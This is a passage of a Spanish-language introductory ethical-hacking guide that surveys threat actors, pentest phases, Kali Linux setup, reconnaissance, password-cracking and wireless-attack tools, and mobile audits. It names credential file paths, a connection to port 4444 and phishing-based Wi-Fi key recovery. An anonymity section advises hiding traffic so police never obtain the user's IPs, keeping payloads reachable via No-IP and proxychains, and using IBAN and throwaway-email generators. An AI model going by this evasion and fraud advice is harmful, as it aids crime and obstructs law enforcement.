0% encontró este documento útil (0 votos)
2 vistas37 páginas

Poder

El documento es una introducción a la ética del hacking y la ciberseguridad, destacando la importancia del conocimiento accesible en este campo. Se exploran diferentes tipos de hackers, sus motivaciones, técnicas de hacking, amenazas digitales y auditorías de seguridad. Además, se proporciona una guía sobre la instalación de sistemas de hacking y herramientas esenciales para la recopilación de información.

Cargado por

johansteam923
Derechos de autor
© All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
0% encontró este documento útil (0 votos)
2 vistas37 páginas

Poder

El documento es una introducción a la ética del hacking y la ciberseguridad, destacando la importancia del conocimiento accesible en este campo. Se exploran diferentes tipos de hackers, sus motivaciones, técnicas de hacking, amenazas digitales y auditorías de seguridad. Además, se proporciona una guía sobre la instalación de sistemas de hacking y herramientas esenciales para la recopilación de información.

Cargado por

johansteam923
Derechos de autor
© All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd

INTRODUCCIÓN

A LA ETICA
DEL HACKING

OSIS INCIBE
INTRODUCCIÓN
Yo no te enseñare a manejar cada herramienta; lo que te estoy
ofreciendo es información de alta calidad. Mi objetivo es que te
introduzcas en el mundo de la ciberseguridad sin sentirte
desorientado. Piensa en esto: una información que por solo 10 euros
estás obteniendo aquí fácilmente podría ser vendida por otros por
500 euros, con explicaciones mucho más básicas. Lo que te estoy
dando no solo es conocimiento accesible, sino de un valor
incalculable.

Todo el contenido proporcionado aquí es fruto de conocimientos


acumulados a lo largo de muchos años de experiencia. Ninguna de
estas explicaciones ha sido generada por inteligencia artificial; se
trata de información auténtica y cuidadosamente elaborada.
Algunos elementos han sido adaptados y traducidos con el apoyo de
la IA para facilitar la comprensión de los pasos, ya que mi intención
no es actuar como un profesor, sino asegurar que el contenido sea
accesible y claro para todos.
¿QUÉ ES UN HACKER?

Probablemente hayamos escuchado el término "hacker" en


multitud de noticias y películas , refiriéndose a un tipo con
propósitos maliciosos que entra en los sistemas para robar
información o simplemente "atacarlos" sin más.

Aquella persona , que gracias a su interés por aprender más, a


través de sus conocimientos obtenidos. Pueda obtener acceso
a información o redes en las que dicha información está
resguardada, por el mero hecho de superar su actual nivel en
su campo .

OBTENIDO POR LA RAE


PERFILES DE HACKERS

En el ámbito de la ciberseguridad, la ética de hackers, crackers o phreakers se


asocia al color de "su sombrero", Una tradición que se originó como metáfora
inspirada en los westerns clásicos. En estas películas, el héroe virtuoso y
protector llevaba un sombrero blanco, mientras que su antagonista, el villano,
lucía un sombrero negro.

Por ello, se emplea el término "hackers de sombrero blanco" para referirse a los
auditores de seguridad informática, también llamados hackers éticos. En
contraste, los "hackers de sombrero negro" representan su opuesto, siendo
comúnmente conocidos como cibercriminales.
AMENAZAS PERSISTENTES AVANZADAS
Seguramente has oído hablar de grupos como Anonymous y el impacto
mediático de sus acciones, desde su enfrentamiento con la Iglesia de la
Cienciología hasta su influencia en procesos electorales en Estados
Unidos. Aunque se les cataloga como "hacktivistas", su estructura
merece atención. Anonymous opera como una sociedad
"descentralizada", lo que significa que no existe una jerarquía fija; sus
miembros actúan en pequeños grupos autónomos con objetivos y
misiones específicos. Esta organización flexible también es una
característica clave de muchas APT.

Un ejemplo notable es Lulz Security, un grupo que surgió dentro de


Anonymous, conocido por acceder a sistemas informáticos, robar
información privada y colapsar servicios, todo ello con el único propósito de
disfrutar del caos generado. Sin embargo, el comportamiento cada vez más
extremo de Lulz Security llevó a Anonymous a distanciarse públicamente de
ellos, marcando una diferencia significativa entre ambos.

Este concepto de grupos descentralizados y sus acciones estratégicas es lo


que coloca a las APT en una liga propia dentro de las amenazas digitales.
Comprender su funcionamiento es el primer paso para anticiparse y
protegerse de sus impactos
THREAT ACTORS: UNA VISIÓN
SIMPLIFICADA Y MEJORADA

En ciberseguridad, los threat actors son personas o grupos que generan


riesgos digitales.

Cibercriminales organizados: Lejos del estereotipo del hacker solitario, son


mafias organizadas que operan como empresas, con departamentos
específicos y redes de contactos. Su objetivo principal es el lucro financiero.
Naciones-Estado: Estos actores realizan ciberataques para obtener ventajas
geopolíticas. Su impacto se aborda más a fondo en el contexto de la
ciberguerra.
Grupos terroristas: Utilizan la red para coordinar ataques, difundir
propaganda y ganar apoyo, impulsados por su ideología a cualquier coste.
Hacktivistas: Actúan por convicciones políticas o sociales, empleando
herramientas digitales de manera generalmente no violenta.
Lobos solitarios: Operan de forma independiente, motivados por diversión o
causas políticas. A menudo están conectados a grupos más grandes.
Insiders: Estos atacantes internos suelen filtrar datos o proporcionar acceso a
sistemas de la empresa por rencor o insatisfacción.

ACTOR MOTIVACIÓN

NACIONES GEOPOLÍTICA
GRUPOS TERRORISTAS IDEOLOGÍA VIOLENTA
HACKTIVISTAS IDEOLOGÍA NO VIOLENTA
LOBOS SOLITARIOS SATISFACCIÓN
INSIDERS DESCONTENTO
TECNICAS DEL HACKING
A continuación, se presentan conceptos esenciales que fortalecen su
comprensión y aplicación:un subtítulo El hacking, lejos de su connotación
negativa, puede definirse como el arte de modificar sistemas y procesos para
funcionar de manera distinta a lo previsto por su creador. Este enfoque puede
ser utilizado con fines éticos, como en el caso del pentesting, o maliciosos,
dependiendo de las motivaciones detrás.
Ataques y Técnicas de Intrusión

Spoofing: Manipulación del tráfico para redirigirlo de forma fraudulenta,


utilizando métodos como envenenamiento IP, ARP o MAC.

Injection: Inserción de código malicioso en sistemas vulnerables para


extraer información, con ejemplos como SQL Injection y LDAP Injection.

Binding: Técnica utilizada para ocultar malware dentro de archivos como


imágenes, videos o audio.

Dorks: Operadores de búsqueda avanzados que permiten extraer


información sensible expuesta en la red.

Scanners: Herramientas utilizadas para identificar puertos abiertos, dorks u


otros datos específicos.

Footprinting/Fingerprinting: Recopilación de información previa al ataque


o al pentesting mediante distintas técnicas.
Seguridad y Fortificación

Hardening: Fortalecimiento de sistemas mediante configuraciones


específicas y medidas de seguridad.
HoneyPots: Sistemas señuelo diseñados para detectar ataques y
recopilar información del atacante.
Firewall: Barrera diseñada para bloquear accesos no autorizados mientras
permite comunicaciones legítimas.
IDS/IPS: Sistemas que detectan y previenen accesos maliciosos en redes y
equipos, estableciendo políticas de seguridad.
Proactividad: Métodos preventivos como formación en buenas prácticas y
contratación de expertos en seguridad informática.

Recopilación de Información y Análisis

Gathering: Fase inicial de recolección de datos sobre la víctima antes de


realizar un ataque.
Metadatos: Información oculta en archivos sobre su creación y modificaciones.
Exif: Metadatos específicos de imágenes que pueden ser extraídos con
herramientas como ExifRead.
Tracear: Rastrear información o actividades en sistemas y redes.

Amenazas Digitales

Malware: Software malicioso diseñado para infectar sistemas y facilitar accesos


no autorizados (backdoors).
Spyware: Código que recopila información para ser enviado posteriormente.
BotNet: Red de equipos infectados que operan de manera autónoma bajo
control remoto.
Troyano: Programa malicioso que permite el acceso a sistemas, distinto a las
puertas traseras creadas por atacantes.
Herramientas y Tecnología

Criptografía: Técnica para proteger datos mediante claves secretas, haciendo


el contenido ilegible sin descifrado adecuado.
Virtualización: Simulación de sistemas operativos dentro de otros para
optimizar recursos y funcionalidades.
Proxy: Intermediario en la navegación web que mejora seguridad, rendimiento o
anonimato.
DMZ: Zona desmilitarizada que separa la red interna de una organización de la
externa para mayor protección.
VPS/VPN: Servidores dedicados y redes privadas virtuales que garantizan
rendimiento y conexión segura.
Script: Archivo de órdenes automatizadas para ejecutar procesos específicos.

Fraudes y Vulnerabilidades

Carding: Uso ilegal de tarjetas de crédito para cometer fraudes.


Trasting: Recopilación de información sensible a través de basura física.
Phishing: Correos electrónicos o mensajes que parecen legítimos pero buscan
robar información confidencial, como contraseñas o datos bancarios
Vishing: Estafas telefónicas donde los atacantes se hacen pasar por
instituciones confiables.
Ciberextorsión: Amenazas para obtener dinero, como el uso de ransomware
para bloquear datos hasta que se pague un rescate.
Estafas de loterías falsas: Mensajes que informan de premios inexistentes y
piden pagos para reclamarlos.
Fraudes en redes sociales: Perfiles falsos que manipulan emocionalmente a
las víctimas para obtener dinero o información.
TIPOS DE AUDITORIAS

Podemos clasificar las auditorías de dos formas, por tipo, en las que
dependerá de la cantidad de información inicial que conozcamos del
objetivo, y por ámbito, en las que la diferencia estará en el sistema
auditado. Vamos a verlas en profundidad a continuación.

5.1. CLASIFICACIÓN POR TIPO

Empezaremos hablando de la diferencia de tipos de auditoría que


existen, ya que, dependiendo de cada una, podemos acabar invirtiendo
más o menos tiempo en ella. Hay tres clases, categorizadas por color:
blanca, negra y gris.

Se cuenta con acceso para evaluar las redes, y se tiene conocimiento total de las
infraestructuras (hardware y arquitectura de la red, S.O. aplicaciones, etc.).
No es tan exhaustiva como una auditoría negra, pero acelera el desempeño y devuelve
resultados más precisos.

Orientada a usuarios: se dispondrá acceso para evaluar la red, así como credencial de
acceso con los mismos privilegios al tipo de usuario que nos han solicitado evaluar.
Combina la de caja negra y caja blanca al limitar los conocimientos de las
infraestructuras a la del usuario a evaluar.
No se dispone de información sobre el objetivo, este tipo de auditoría es el que más
tiempo llevará, ya que tendremos que recabar información sobre las infraestructuras
del "objetivo" para llevar a cabo el análisis de su seguridad en el caso de un ataque
externo malicioso. También es la más costosa económicamente.
FASES DE UN
PENTESTING

En este contenido, te voy a mostrar cómo se generan ingresos dentro del


mundo de la ciberseguridad. Se trata de información invaluable que te
dará una perspectiva única sobre este sector. Te invito a prestar atención,
ya que este conocimiento es realmente valioso y puede marcar la diferencia
en tu comprensión de este campo.

El concepto metodológico de Penetration Testing Execution Standard


(PTES) lo crearon profesionales en el área de las auditorías de seguridad.
Esta metodología se encuadra en la metodología OSSTMM, que unifica los
esfuerzos de expertos en seguridad y de analistas para elaborar un
estándar que pueda perfeccionar una auditoría en todo su desarrollo.
InfoSec Institute afirma que la prueba de penetración se divide en siete
fases y que puede utilizarse este estándar para llevar a cabo una prueba de
penetración efectiva en cualquier entorno.

Un pentest o prueba de penetración se divide en siete fases y a su vez estas


se dividen en varias subfases, dependiendo de las capacidades de
penetración y la seguridad de la prueba. Las siete fases generales se
clasificarían de la siguiente forma:

Fase 1: Contrato y alcance.


Fase 2: Recolección de información.
Fase 3: Escaneo y enumeración.
Fase 4: Análisis de vulnerabilidades
Fase 5: Explotación
Fase 6: Postexplotación
Fase 7: Elaboración del informe
INSTALACIÓN DEL SISTEMA HACKING

1. Descarga la ISO de Kali Linux


Ve a la página oficial de Kali Linux y descarga la imagen ISO adecuada para tu
sistema (32 o 64 bits). [Link]
Verifica la integridad del archivo descargado utilizando el checksum proporcionado en
la página.

2. Preparación del Medio de Instalación


Si deseas instalarlo en una máquina física, utiliza herramientas como Rufus o Balena
Etcher para crear un USB booteable con la ISO.
Si prefieres una máquina virtual, descarga e instala software como VirtualBox o
VMware.

3. Configuración de la Instalación
Arranca desde el USB booteable o configura la máquina virtual para iniciar desde la
ISO.
Selecciona la opción de instalación gráfica para una experiencia más intuitiva.

4. Proceso de Instalación
Configura el idioma, la ubicación y el teclado.
Crea un usuario y establece una contraseña segura.
Particiona el disco (puedes elegir particionado automático si no tienes experiencia)
Selecciona las herramientas y el entorno de escritorio que deseas instalar (por ejemplo,
XFCE).

5. Finalización
Instala el cargador de arranque (GRUB) en el disco principal.
Reinicia el sistema y accede con las credenciales creadas.

Este es el sistema que marca el inicio de todo aspirante a hacker. Aprende desde sus
cimientos para construir una base sólida y, así, expandir tus conocimientos en el
mundo del hacking hasta alcanzar nuevos horizontes.
ls: Muestra el contenido de un directorio. Útil para explorar archivos y
carpetas.
Ejemplo: ls -l muestra detalles como permisos, tamaño y fecha.

cd Función: Cambia de directorio en el sistema de archivos.


Ejemplo: cd /home/user te lleva al directorio del usuario.

pwd Función: Muestra el directorio actual en el que estás trabajando.


Ejemplo: pwd devuelve algo como /home/user.

apt-get Función: Se utiliza para gestionar paquetes. Puedes instalar,


actualizar o eliminar software.
Ejemplo: sudo apt-get update actualiza la lista de paquetes.

ping Función: Comprueba la conectividad con otros dispositivos o servidores


mediante paquetes ICMP.
Ejemplo: ping [Link] verifica si puedes alcanzar Google.

ifconfig Función: Muestra o configura las interfaces de red.


Ejemplo: ifconfig eth0 muestra información sobre la interfaz de red Ethernet.

mkdir Función: Crea un nuevo directorio en el sistema.


Ejemplo: mkdir NuevaCarpeta crea una carpeta llamada "NuevaCarpeta". r

rm Función: Elimina archivos o directorios. Ejemplo:


rm [Link] elimina el archivo específico.

cat Función: Muestra el contenido de un archivo.


Ejemplo: cat [Link] imprime el contenido del archivo.

sudo Función: Ejecuta comandos con permisos de superusuario.


Ejemplo: sudo apt-get install nmap instala Nmap con permisos elevados.

msfconsole Función: Abre la consola de Metasploit para realizar pruebas


Ejemplo: Escribe msfconsole para iniciar el framework Metasploit.

iwconfig Función: Gestiona configuraciones de redes inalámbricas. 12


Ejemplo: iwconfig wlan0 muestra detalles de la interfaz inalámbrica
RECOPILACIÓN DE
INFORMACIÓN

HERRAMIENTAS BASICAS

WHOIS. , PING. , TRACERT/TRACEROUTE , NSLOOKUP , DIG , GOOGLE DORKS

IMPORTANCIA DE LOS METADATOS / HERRAMIENTAS EXPERTAS

FUENTES ABIERTAS DE PAGINAS WEB

Ofrece información sobre una organización [Link]

El sitio web [Link] un ejemplo de buscadores de dominios


que permite cotejar la información de un dominio existente.

Sitios web como [Link] o [Link]


permiten obtener fácilmente información si determinada persona o la dirección
de correo electrónico que utiliza ha podido verse comprometida.

Tienes una guía de funcionamiento disponible por parte de Google en la siguiente


URL.

[Link]
636214053358027050-1602025414&rd=1
Extracción de Metadatos

ExifTool: Una herramienta de línea de comandos que permite leer,


escribir y editar metadatos en archivos de imágenes, audio y video. Es
ideal para analizar datos como ubicación GPS, fecha de creación y
detalles técnicos de archivos multimedia.
Metagoofil: Diseñada para recopilar metadatos de documentos
públicos (PDF, DOC, XLS, etc.) disponibles en línea. Extrae información
como nombres de usuarios, correos electrónicos y rutas de archivos, útil
para análisis de seguridad y OSINT (inteligencia de fuentes abiertas).

Búsqueda en Motores Especializados

Motores para fugas de datos: Plataformas como Intelligence X permiten


buscar información filtrada en la web, incluyendo correos electrónicos,
contraseñas y datos sensibles. Son útiles para investigaciones de
ciberseguridad y análisis de brechas.

Recopilación de Correos y Teléfonos

Hunter: Herramienta para encontrar correos electrónicos asociados a


dominios específicos. Ideal para marketing y prospección.
RocketReach: Plataforma que proporciona correos electrónicos,
números de teléfono y perfiles sociales de profesionales, útil para
networking y ventas.
Lusha: Similar a RocketReach, ofrece datos de contacto verificados
para prospectos B2B, con un enfoque en la precisión y la integración con
CRM.
ANALISIS DE PUERTOS Y
VULNERABILIDADES

El fingerprinting se ejecuta en la etapa donde se recolecta información


directamente del sistema de una organización u objetivo, para conocer
mejor su configuración, puertos, etcétera, en la fase de escaneo.

HERRAMIENTAS EXPERTAS

NESSUS - Se recomienda instalar Nessus en la máquina nativa, y no la virtual ,


consiste en un analizador de vulnerabilidades

NMAP - Escaneo de puertos y vulnerabilidades

NIKTO - está diseñado únicamente para aplicaciones web, por lo que si el


objetivo no tuviese dicho servicio, se puede omitir el hecho de su utilización.

OWASP-ZAP - La ventaja de esta aplicación es que, al contrario que Nikto,


trabaja bajo una interfaz gráfica intuitiva para el pentester.

SQLMAP- para encontrar y explotar vulnerabilidades de inyección SQL en una


página web.

MERASPLOIT - consiste en un framework que engloba diversas herramientas


que pueden servir tanto para la labor de análisis , como de explotación de
vulnerabilidades

Websploit - apt-get install websploit , está enfocado únicamente al análisis de


aplicaciones web.

SEARCHSPLOIT - búsqueda de exploits

WPSCAN / JOOMSCAN - El funcionamiento de ambos es semejante,


simplemente cambian los parámetros.
1. Descubrimiento de Máquinas: ARP
Comando: netdiscover
Uso: Escanea redes para identificar dispositivos conectados mediante protocolo
ARP.
Ejemplo: netdiscover -i InterfazDeRed -r RANGO_IP/MÁSCARA
-i: Especifica la interfaz de red.
-r: Define el rango de IPs y subred.

2. Fase de Escaneo: Recopilación de Información sobre Servicios


Durante esta etapa, se recolectan datos clave a través de servicios disponibles en la red.
NetBIOS:
Comando: nbtscan -r ipvictima/24
Uso: Identifica equipos y recursos compartidos en redes Windows.
CURL:
Comando: curl -I
Uso: Recupera encabezados HTTP/S de sitios web para analizar configuraciones
del servidor.
Netcat:
Comando: nc -h o netcat (IP) (PUERTO)
Uso: Herramienta versátil para conexión a puertos TCP/UDP y escaneo básico.
Telnet:
Comando: telnet (IP) 4444
Uso: Conecta directamente a puertos específicos para interactuar con servicios.

3. Calculadora de Vulnerabilidades
Herramienta del NIST: Accede a la calculadora del NIST para evaluar el impacto de
vulnerabilidades usando el estándar CVSS. Es útil para priorizar riesgos.

4. Servicios Comúnmente Atacados


A continuación, se enumeran servicios frecuentemente vulnerables y potenciales objetivos
de pruebas o ataques:
SSH (Secure Shell): Métodos comunes: Fuerza bruta, explotación de configuraciones
débiles.
SMTP (Simple Mail Transfer Protocol): Enfoques: Relays abiertos, phishing.
SMB (Server Message Block): Explotaciones: Vulnerabilidades como EternalBlue, robo
de credenciales.
SNMP (Simple Network Management Protocol): Problemas: Uso de cadenas de
comunidad débiles o por defecto.
FTP (File Transfer Protocol): Fallos comunes: Autenticación básica, falta de cifrado.
Las contraseñas en los sistemas Windows se encuentran almacenadas en:
Windows/system32/config
Las contraseñas en los sistemas Debian se encuentran almacenadas en :
/etc/passwd o /etc/shadow

Diccionarios disponibles en la red


Rockyou contiene las credenciales de los usuarios afiliados a la página web rockyou,
por lo que es un básico de nuestro repertorio.
- [Link]

CrackStation ofrece un diccionario que una vez está descomprimido pesa alrededor de
15 Gb, muy útil para ataques a servicios como smb, rdp, smtp, etc =
[Link] O [Link]

Website.
[Link]

GENERACIÓN DE DICCIONARIOS PERSONALIZADOS

CRUNCH es útil para crear diccionarios de contraseñas basados en patrones


específicos que tú defines, La ayuda de crunch (crunch –help)

CEWL nos permite crear el diccionario a partir de websites que le indiquemos, La


ayuda de CEWL ( cewl --help)

CUPP ofrece crear un diccionario personalizado hacia una persona


[Link] (Cuanto mejor sea la recolección de información
pública, normalmente, mayor será la tasa de éxito de nuestro ataque.)
Herramientas para un ataque nivel experto

HYDRA ,MEDUSA son casi iguales los ataques que hacen son llamados online ya
que están haciendo intentos de login contra el servicio que se vaya a atacar, Accede
al enlace para ver la tabla comparativa.
[Link]

HASHCAT , se recomienda el uso de Hashcat en la máquina nativa . al


proporcionarse ya la información cifrada que se quiere descifrar, se considera un
método offline

JOHN THE RIPPER ohn the Ripper es una herramienta de criptografía que aplica
fuerza bruta para descifrar contraseñas. Es capaz de romper varios algoritmos de
cifrado o hash, como DES, SHA-1 y otros.

Una rainbow table es una tabla que contiene el hash (realmente parte de él) producido
por multitud de contraseñas ,se pueden obtener de muchos sitios, uno de ellos es.

Ophcrack es un programa que utiliza tablas rainbow para descifrar contraseñas; para
su ejecución solo deberemos escribir el comando:ophcrack

SCRIPTS DE GIT HUB EN EN ESTE TEMA

Script recomendado – [Link]


SecLists - es un script que ya tiene los diccionarios para hacer una ataque
[Link]
HERRAMIENTAS DE EXPLOTACIÓN
Una vulnerabilidad es un código que permite a un atacante aprovecharse de un servicio del
sistema operativo

-Una vulnerabilidad puede componerse de dos partes:


La primera es un código malicioso EXPLOIT
La segunda parte recibe el nombre de payload.

-La gravedad de una vulnerabilidad se ve reflejada por:


La gravedad de la incidencia.
La repercusión para nuestro cliente.
La complejidad para poder llevar a cabo dicha vulnerabilidad
.
Se hará una media de esos tres valores para poder indicar en nuestro informe el valor real de
la incidencia.

Para ello podemos usar como base numérica la que podemos obtener desde el sitio Web de
[Link].
[Link]

Metasploit es una herramienta de validación de vulnerabilidades y explotación que nos


ayuda en nuestra tarea de auditoría. Es posiblemente el framework de pentesting más
utilizado. Al iniciar metasploit hay que poner el comando .

“sudo service postgresql start “ [Link]

Es un escáner de vulnerabilidad de código abierto que realiza evaluaciones en profundidad,


detectando la vulnerabilidad conocida y ayudando a las organizaciones a gestionar los
posibles riesgos de seguridad.

[Link]
TIPOS DE EXPLOIT

LOCALES
REMOTOS
DENEGACION DE SERVICIO

BUSQUEDA DE EXPLOITS

[Link]

[Link]

-En el caso de una vulnerabilidad de descubrimiento de un tipo de aplicación web,


puede descubrirse de forma activa la estructura de dicha aplicación web. Las
herramientas dirb, dirbuster o wfuzz sirven para dichas tareas.

DENEGACIÓN DE SERVICIOS

Existen múltiples clasificaciones de ataques DoS debido en parte al gran número y


diversidad de estos. Una de ellas se basa en el tipo de daño o efecto provocado

Saturación
Modificación de la configuración
Destrucción
Disruptivo
Obstrucción

Tanto Metasploit como Searchsploit pone al alcance un gran listado de exploits


orientados a la denegación de servicios

SlowHTTPTest es una herramienta altamente configurable que simula algunos ataques


de denegación de servicio de la capa de aplicación al prolongar las conexiones HTTP de
diferentes maneras.

+ Info
Podemos obtener más información en la página del proyecto, en GitHub.
[Link]
COMO SER INVECIBLE EN LA RED

Tor no es solo una red, es una herramienta esencial para preservar la


privacidad en un mundo digital cada vez más vigilado. Utilizando técnicas
avanzadas de anonimato, Tor encripta el tráfico y lo redirige a través de
múltiples nodos, dificultando cualquier intento de rastreo. Sin embargo, es
importante reconocer que esta capa adicional de seguridad puede
impactar en el rendimiento de algunas herramientas, particularmente
debido a la latencia inherente a su enrutamiento.

Instalación de Tor Para incorporar Tor a tu arsenal, abre una terminal en Kali Linux e
ingresa el siguiente comando: apt-get install tor

Habilitación del Servicio Una vez completada la instalación, activa el servicio de la red Tor
ejecutando: service tor start

Complementos Útiles Para maximizar su funcionalidad, puedes instalar herramientas


complementarias como HexChat mediante el comando: apt-get install hexchat

Con esta configuración, estarás listo para navegar de manera anónima y explorar un mundo
de información y herramientas cuidadosamente oculto en las profundidades de la red.

TORGHOST REDIRIGE TODO EL TRÁFICO MEDIANTE LA RED TOR.


GIT CLONE HTTPS://[Link]/SUSMITHHCK/[Link]
RED I2P RED ANÓNIMA PARA COMUNICACIÓN SEGURA ENTRE APLICACIONES.
SUDO APT-GET INSTALL I2P Y SUDO SERVICE I2P START

No-IP y Proxychains
Solución para mantener la conectividad de payloads sin cambiar la dirección
IP constantemente.
Combina No-IP con Proxychains para redirigir el tráfico a través de la red
TOR.

Recomendación: Instalar tu propio servidor VPN (por ejemplo, con OpenVPN) en


un hosting remoto para garantizar la seguridad del tráfico y en ningun caso la
policia tendra tus ips

Generador de Números IBAN


Servicio útil para generar números IBAN válidos:
[Link]

GENERADOR DE GMAILS
servicio para generar entradas a paginas sin tus datos personales :
[Link]
EL ARTE DEL HACKING WIRELESS

La metodología OWISAM (Open Wireless Security Assessment Methodology) es un


marco ampliamente reconocido para llevar a cabo auditorías de redes inalámbricas. Este
proceso aborda tanto los fundamentos técnicos como el cumplimiento normativo.
Conceptos Claves

Handshake SSID: Proceso de autenticación entre dispositivos.


Dirección y MAC: Identificadores únicos para dispositivos en la red.
WAP (Wireless Access Point): Punto de acceso inalámbrico.
Frames y Beacons: Elementos de comunicación que estructuran y transmiten datos
en la red
.
Fases de la Auditoría

Planificación: Definición de objetivos y preparación inicial antes del análisis técnico.


Recopilación de Información: Monitoreo pasivo para identificar dispositivos
conectados.
Identificación de Dispositivos: Obtención de detalles críticos de la infraestructura
inalámbrica.
Ataques: Análisis de vulnerabilidades y debilidades en los dispositivos Wi-Fi.
Acceso a la Red: Evaluación y pruebas de interacción con la infraestructura.
Pruebas Normativas: Verificación de cumplimiento con estándares y directivas de
seguridad.
Generación de Resultados: Creación de informes detallados con evidencia
recopilada y clasificación de riesgos identificados.
Herramientas

Airgeddon es un script desarrollado en bash para auditar redes wireless,


tiene un menú muy intuitivo y nos aísla de herramientas como las vistas
anteriormente.

[Link]

Fluxion es una herramienta de ingeniería social y auditoría de seguridad.


El script intenta recuperar la clave WPA / WPA2 de un punto de acceso
de destino mediante un ataque de ingeniería social (phishing). Es
compatible con la última versión de Kali.

git clone [Link]

CHARLES M. SCHULZ

Wireshark es una herramienta de análisis de tráfico de red que permite


capturar y examinar paquetes en tiempo real para diagnosticar
problemas, detectar vulnerabilidades monitorizar la actividad en redes.
SUITE DE AIROPLAY-NG

Airmon-ng
va a hacer que nuestro adaptador wireless pase al modo «monitor», Y que permitirá
comenzar a esnifar el tráfico de balizas que hay.

Airodump-ng
Airodump permite que podamos esnifar las balizas que pueda captar nuestro
dispositivo en modo «monitor» (o modo promiscuo). Para comenzar a ver un listado
de redes wireless simplemente escribiremos airodump-ng
nuestrodispositivoenmodomonitor.

ATAQUE DE DESAUTENTICACIÓN AIREPLAY-NG


Permite lanzar ataques de desautorización para romper la conexión entre un punto
de acceso y su cliente, forzando a que este último mande de nuevo el handshake
para poder capturarlo. Aprendan a utilizar esta herramienta van a saber lo que es
sastifacción
CIBERINTELIGENCIA
[Link]

La ciberinteligencia es un área estratégica dentro de la seguridad informática que


se centra en recolectar, analizar y usar información para prevenir, identificar y
mitigar amenazas en el ciberespacio. A través de técnicas avanzadas y
herramientas especializadas, también permite a organizaciones, gobiernos y
usuarios proteger sus activos digitales y tomar decisiones informadas ante
potenciales riesgos.

En esencia, la ciberinteligencia combina elementos de inteligencia tradicional con


tecnologías modernas, con el objetivo de adelantarse a los adversarios y garantizar
la seguridad en entornos cada vez más digitales. Esto incluye el análisis de datos en
tiempo real, la evaluación de vulnerabilidades, y el seguimiento de actividades
sospechosas.

Herramientas Expertas de Ciberinteligencia


1. IKY: Una herramienta de OSINT (Open Source Intelligence) que permite
recolectar información de fuentes abiertas, especialmente correos electrónicos.
Ideal para investigaciones iniciales.
2. Sherlock: Diseñada para buscar nombres de usuario en múltiples plataformas.
Es útil para rastrear perfiles en redes sociales y otras plataformas en línea.
3. Power BI: Una herramienta de inteligencia empresarial que permite analizar y
visualizar datos. Muy demandada en empresas para la toma de decisiones
estratégicas.
Herramientas de Visualización
1. Kibana: Utilizada para explorar y visualizar datos almacenados en
Elasticsearch. Ideal para análisis de registros y monitoreo.
2. Grafana: Ofrece paneles interactivos para monitorear datos de múltiples
fuentes. Es ampliamente utilizada en entornos de SIEM para visualización
avanzada.

Herramientas SIEM (Security Information and Event Management)


1. QRadar: Una solución de IBM que centraliza la gestión de eventos de
seguridad y facilita la detección de amenazas.
2. Graylog: Una herramienta de código abierto para la gestión de registros.
Permite analizar datos de múltiples fuentes.
3. SolarWinds: Ofrece soluciones para monitoreo de redes y gestión de eventos
de seguridad.

Herramientas SOAR (Security Orchestration, Automation, and Response)


1. Splunk Phantom: Automatiza respuestas a incidentes de seguridad y permite
integrar múltiples herramientas.
2. IBM Resilient: Facilita la gestión de incidentes de seguridad con flujos de
trabajo automatizados.

Inteligencia de Amenazas - Análisis de Malware


1. McAfee Active Response: Detecta y responde a amenazas en tiempo real.
2. Cuckoo Sandbox: Analiza malware en un entorno aislado para identificar su
comportamiento.
3. MalwareFox: Ofrece protección contra malware y análisis de amenazas.
4. [Link]: Una plataforma interactiva para analizar malware en tiempo real.

Evaluación de Riesgos
1. Proxifier: Permite redirigir conexiones de red a través de proxies, útil para
pruebas de seguridad.
2. Uniscan: Escanea vulnerabilidades en aplicaciones web y evalúa riesgos.
VULNERABILIDADES Y SEGURIDAD EN
MÓVILES MODERNOS

Una auditoría móvil implica un examen exhaustivo del modelo del dispositivo, su
firmware instalado, así como de las aplicaciones y archivos almacenados. Su
propósito es evaluar el nivel de seguridad del smartphone, identificando posibles
vulnerabilidades y garantizando la integridad del sistema.

Proceso Profesional para Verificar la Seguridad de un Dispositivo Móvil

1. Identificación del Modelo: Determina el modelo del dispositivo utilizando


su IMEI. Puedes verificarlo en sitios especializados como Numbering Plans.
2. Verificación del Operador: Comprueba el proveedor del servicio móvil a
través de plataformas específicas como PeopleCall.
3. Análisis de la Tarjeta SD: Recopila toda la información almacenada en la
tarjeta SD para realizar un análisis de metadatos con herramientas como
FOCA.
4. Revisión de Configuración Manual: Evalúa posibles errores de
configuración, como métodos de protección del dispositivo, instalación de
APKs de origen desconocido, y ajustes de geolocalización, Bluetooth o Wi-Fi.
5. Consulta de Vulnerabilidades del Firmware: Investiga posibles exploits
del sistema operativo en bases de datos como Rapid7 y Exploit-DB para
documentarte sobre fallos de seguridad.
6. Prueba de Rooteo: Verifica la posibilidad de obtener acceso root en
función del análisis del firmware del dispositivo.
7. Evaluación de Vulnerabilidades: Realiza un análisis técnico de seguridad
con herramientas como NMap o Nessus, e identifica oportunidades de
explotación basadas en las vulnerabilidades detectadas.
8. Obtención del IMEI: Para dispositivos Android, marca *#06# en el teclado
numérico del teléfono para obtener el número IMEI.

Este enfoque detallado permite evaluar de manera metódica la seguridad de un


dispositivo sin entrar en análisis forenses, utilizando herramientas y recursos
clave.
Este apartado requiere una concentración absoluta. En Kali Linux, la
terminal se convierte en tu aliado más poderoso para desplegar
herramientas especializadas que te permiten analizar, investigar y obtener
información detallada sobre un objetivo.

Con un enfoque preciso y eficiente, puedes identificar vulnerabilidades y


recopilar datos clave, convirtiendo tus esfuerzos en resultados
estratégicos. **El uso de estas capacidades exige ética y responsabilidad,
siempre respetando las leyes y los principios de ciberseguridad.**

Este no es solo un ajuste técnico; es el eslabón perdido que, cuando se


aplica correctamente, abre puertas en el mundo digital que parecían
imposibles de cruzar. Prepárate para descubrir lo que otros ni siquiera
imaginan. ¿Estás listo para adentrarte en un conocimiento que pocos han
logrado dominar?
Antes de comenzar cualquier procedimiento, es fundamental asegurarse de contar
con la versión 8 de Java configurada correctamente. Este entorno es esencial para
garantizar la compatibilidad y el rendimiento esperado. La versión requerida, Java 8
(java-8-openjdk), debe instalarse y configurarse como predeterminada.

apt install openjdk-8-8jdk y se pueden configurar por defecto con la


sentencia update-alternastives ( La versión que se debe de elegir es la numero 1 en
ambas diapositivas)

TELEFONÍA MÓVIL
